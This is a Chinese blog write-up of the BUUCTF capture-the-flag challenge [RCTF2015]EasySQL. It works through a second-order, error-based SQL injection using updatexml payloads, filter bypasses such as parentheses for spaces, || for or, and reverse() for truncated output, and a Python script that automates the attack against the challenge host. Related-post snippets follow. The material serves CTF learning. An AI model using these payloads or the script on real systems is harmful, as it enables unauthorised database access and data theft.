BUUCTF:[RCTF2015]EasySQL

最新推荐文章于 2025-06-02 04:20:29 发布
原创 最新推荐文章于 2025-06-02 04:20:29 发布 · 4.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了BUUCTF中RCTF2015的EasySQL挑战,通过注册用户进行fuzz测试,发现并利用SQL注入漏洞,逐步揭示数据库结构,最终获取flag。介绍了使用updatexml和正则表达式技巧,逆序输出flag内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

BUUCTF:[RCTF2015]EasySQL
参考:https://www.cnblogs.com/peri0d/p/11599643.html
在这里插入图片描述
先注册一个用户
在这里插入图片描述
在注册的时候,fuzz测试发现在username和email中过滤了以下字符:

@
or
and
space(空格)
substr
mid
left
right
handle
没有源码慢慢测试.......

登录,发现还有个改密码
在这里插入图片描述
在注册时用户名加些测试字符进去,'mochu7"\
在这里插入图片描述
然后登录,在修改密码的时候,发现报错了,这样基本确定应该存在二次注入,在注册的时候写入,改密码的地方修改密码后触发导致错误输出,有错误回显就可以使用报错注入
在这里插入图片描述
猜测sql执行语句

select * from user where username=" 'mochu7"\ " and password=' 80f26dc7f48fc63a753d8f7d1b5bc507 '

构造payload

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

使用||代替or,把每个执行的部分使用括号来代替空格的区分作用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
存在article,flag,users,flag表

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#

这里有个坑,flag不在flag表中
在这里插入图片描述
在这里插入图片描述
查不出来值,真正的flag在users表中

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

在这里插入图片描述

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

regexp('^r')是MySql的正则,^r匹配开头是r的字段,也就是column_name=real_flag_1s_her
在这里插入图片描述
做到这里发现了输出长度限制

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

这里regexp('^f')的意思是查找字段中f开头的内容,其实就是在找flag{XXXX}

在这里插入图片描述
使用reverse()函数把flag逆序出来就可以看到后面的内容了

username=mochu7"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

在这里插入图片描述
也可以写个脚本来拿flag,自动化脚本如下:

import requests

url_reg = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/register.php'
url_log = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/login.php'
url_change = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/changepwd.php'

pre = 'mochu7"'
#逆序闭合
suf = "')))),1))#"

#正序闭合
#suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
    data = {
        'username' : name,
        'password' : '123',
        'email' : '123',
    }
    r.post(url=url_reg, data=data)

def login(name):
    data = {
        'username' : name,
        'password' : '123',
    }
    r.post(url=url_log, data=data)
    
def changepwd():
    data = {
        'oldpass' : '',
        'newpass' : '',
    }
    kk = r.post(url=url_change, data=data)
    if 'XPATH' in kk.text:
        print(kk.text)

for i in s:
    #正序
    #paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    #逆序
    paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(paylaod)
    login(paylaod)
    changepwd()


#正序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "'))),1))#"
#逆序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "')))),1))#"

在这里插入图片描述

BUUCTF__web题解合集(十二)
风过江南乱的博客
10-14 1004
1、[BSidesCF 2019]Kookie 2、[CISCN2019 华北赛区 Day1 Web5]CyberPunk 3、[RCTF2015]EasySQL 4、[Zer0pts2020]Can you guess it? 5、[HITCON 2017]SSRFme
BUUCTF_Web([RCTF2015]EasySQL)二次注入+报错注入
2401_87524087的博客
01-21 1064
二次注入是一次注入通过两次操作实现,注册和登陆。题目: 只有登录和注册两个选项。
BUUCTF[极客大挑战 2019]EasySQL 1题解
最新发布
2301_79896143的博客
06-02 1285
SQL注入基础题解 本文以"[极客大挑战 2019]EasySQL"为例,解析了SQL注入的基本原理和解题过程。题目是一个采用GET请求的登录界面,通过输入测试发现存在SQL注入漏洞。文章详细分析了数字型和字符型注入的区别,指出该题属于字符型注入。解题采用"万能密码"方法,通过构造1' or '1'='1等payload绕过验证。最终获得flag{c245efae-9088-4dec-8c2e-5c34c73392e9},展示了初级SQL注入的类型判断和payload构造技巧。
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1473
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
[RCTF2015]EasySQL
shinygod的博客
04-11 727
知识点:updatexml报错注入,二次注入 解析 当我们注册的时候,在注册处username注入我们的sql语句 然后在改密码处改密码的时候会报错,那我们就可以利用报错注入。 可以猜出sql语句:select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e' import requests session = requests.session() url = 'http://3831
2025.1.20——一、[RCTF2015]EasySQL1 二次注入|报错注入|代码审计
2402_87387800的博客
01-20 1235
题目来源:buuctf [RCTF2015]EasySQL1。
[初级]sql注入之二次注入[RCTF2015]EasySQL 1(报错注入,爆库,表)
BlingZeng的博客
02-09 3994
BUUCTF的[RCTF2015]EasySQL1 题目的解题文章,如果有兴趣可以一起探讨一下。使用的方法是二次注入,报错注入,爆库、表等手段
BUUCTF [RCTF2019]babyre1
weixin_53349587的博客
01-01 1056
1.先分析一下大致的流程: 1)输入flag,先进行长度判断,是不是16位 2)sub_562AB8800C00函数:判断输入的flag是否为16进制数 3)sub_562AB8801180函数:xxtea解密(无填充模式),密钥是unk_562AB8A02010 4)sub_562AB88013D0函数:CRC16校验,具体可以参考CRC校验码简介及CRC16的计算方法 - 21ic电子网 5)最后将解密后的数据与0x17异或,最终得到"Bingo!" 2.分析具体的解密过程 1)先
buuctf web [SUCTF 2019]EasySQL详细讲解
qq_61988806的博客
10-27 1617
buuctf web [SUCTF 2019]EasySQL详细讲解
buuctf-[RCTF2015]EasySQL
qq_43615820的博客
09-29 411
Fuzz 测试 过滤: and insert ascii substr left rigth sleep floor < like /**/ %20 思路: 注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果 爆破: admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1 用户: admin"or(updatexml('~',concat('~',database(),'~'),'~'.
[buuctf][RCTF2015]EasySQL
weixin_43952190的博客
07-26 1174
[RCTF2015]EasySQL 进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。 因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。 注册admin\,登陆进去后修改密码,结果出现报错。 可以看到原语句中的username是双引号闭合的,所以单引号注册的账号是不起作用的.由此推断,我们注册admin"#因为闭合语句且将后面进行了注释,所以是可以sql语句会变为
BUUCTF:你竟然赶我走
05-14
<think>好的,我现在要帮助用户解决BUUCTF中的“你竟然赶我走”隐写术挑战。用户提到他们尝试了stegsolve和010editor但没找到flag,可能flag藏在图片属性备注里。根据引用中的信息,特别是引用[4]提到有些题会直接把flag放在图片属性备注中,这可能是个关键线索。 首先,用户可能已经检查了常见的隐写方法,比如LSB、EXIF信息、文件结构分析,但没结果。这时候需要考虑更简单的地方,比如图片属性。特别是Windows右键属性里的备注或详细信息字段,可能直接包含flag,容易被忽略,因为通常认为题目会复杂些。 接下来,用户可能没有正确使用010editor的模板功能。引用[3]提到010editor的模板可以检测到未知的填充段,可能有隐藏数据。需要指导用户如何运行模板,查看是否有异常部分,比如unknownPadding或者其他非标准数据块。 另外,引用[4]提到高帧数GIF可能需要其他工具,但此题可能不是动图。不过,用户的问题中没有提到文件类型,可能需要确认是否为静态图片。如果是静态图,重点在属性;如果是动图,可能需要分帧检查。 用户可能还需要检查文件末尾是否有附加数据,比如用010editor查看十六进制,在文件末尾是否有可读字符串,或者使用strings命令提取文本。此外,尝试修改文件扩展名,看看是否是伪装的压缩包,但引用[2]提到密码可能在图片中,但用户可能已经尝试过。 综合来看,最可能的解决方案是检查图片属性中的备注,或使用010editor详细分析文件结构,特别是模板检测后的未知部分。需要一步步引导用户检查这些地方,避免复杂方法,回归基础步骤。</think>### BUUCTF“你竟然赶我走”隐写术解题思路 #### 解题步骤分析 1. **基础信息检查** - 右键查看图片属性,在「详细信息」或「备注」字段直接寻找flag(部分简单题目直接明文存储)[^4] - 使用Windows自带的文件属性检查工具,或通过命令行工具`exiftool`提取元数据 ```bash exiftool filename.jpg ``` 2. **010 Editor深度分析** - 使用模板解析文件结构(操作路径:工具栏「视图」>「模板结果显示」) - 重点关注以下异常部分: - **unknownPadding**:可能存在隐藏数据段[^3] - **文件末尾附加数据**:滚动到十六进制编辑器底部,检查是否有可读字符串或加密内容 - **文件头/尾异常**:例如实际文件类型与扩展名不符(如伪装成图片的压缩包) 3. **Stegsolve进阶检测** - 尝试所有通道组合(Red/Green/Blue/Alpha平面,LSB隐写等) - 若为灰度图,检查「Frame Browser」中的单帧数据 - 使用「Analyse」>「Data Extract」功能,勾选不同位平面组合导出数据 4. **隐藏文件提取** - 若发现文件末尾附加数据,可通过`dd`命令分离(示例): ```bash dd if=filename.jpg of=hidden_data.zip skip=<已知数据长度> bs=1 ``` - 尝试修改文件扩展名为`.zip`/`.rar`,检查是否包含加密压缩包(需结合引用[2]中的密码查找方法) #### 关键提示 - 本题可能直接通过**图片属性备注**或**文件末尾明文flag**解决,避免过度复杂化分析[^4] - 若使用上述方法未果,需考虑冷门隐写方式: - **DCT系数修改**(JPEG频域隐写) - **ID3标签隐写**(多见于音频文件,但部分图片元数据也可能利用) - **文本隐写**:通过`strings filename.jpg | grep "flag{"`快速检索
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板~感谢!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值